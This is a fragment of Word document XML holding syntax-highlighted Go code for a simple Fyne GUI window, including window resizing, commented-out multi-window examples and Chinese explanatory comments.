          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>w.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>container</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewVBox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>makeUI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()))</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>窗口大小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>w.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Resize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="AFBF7E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NewSize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>300</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6897BB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>))</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>添加子控件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>w.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">//// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>窗口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//w2 := a.NewWindow("Larger")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//w2.SetContent(widget.NewLabel("More content"))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//w2.Resize(fyne.NewSize(100, 100))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//w2.Show()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">//// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>窗口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，点一次则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>一个新空间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//w2.SetContent(widget.NewButton("Open new", func() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>w3 := a.NewWindow("Third")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>w3.SetContent(widget.NewLabel("Third"))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>w3.Show()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//}))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ShowAndRun()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>函数也可以分开使用，一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>是一个窗口，一个程序只能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="B09D79"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
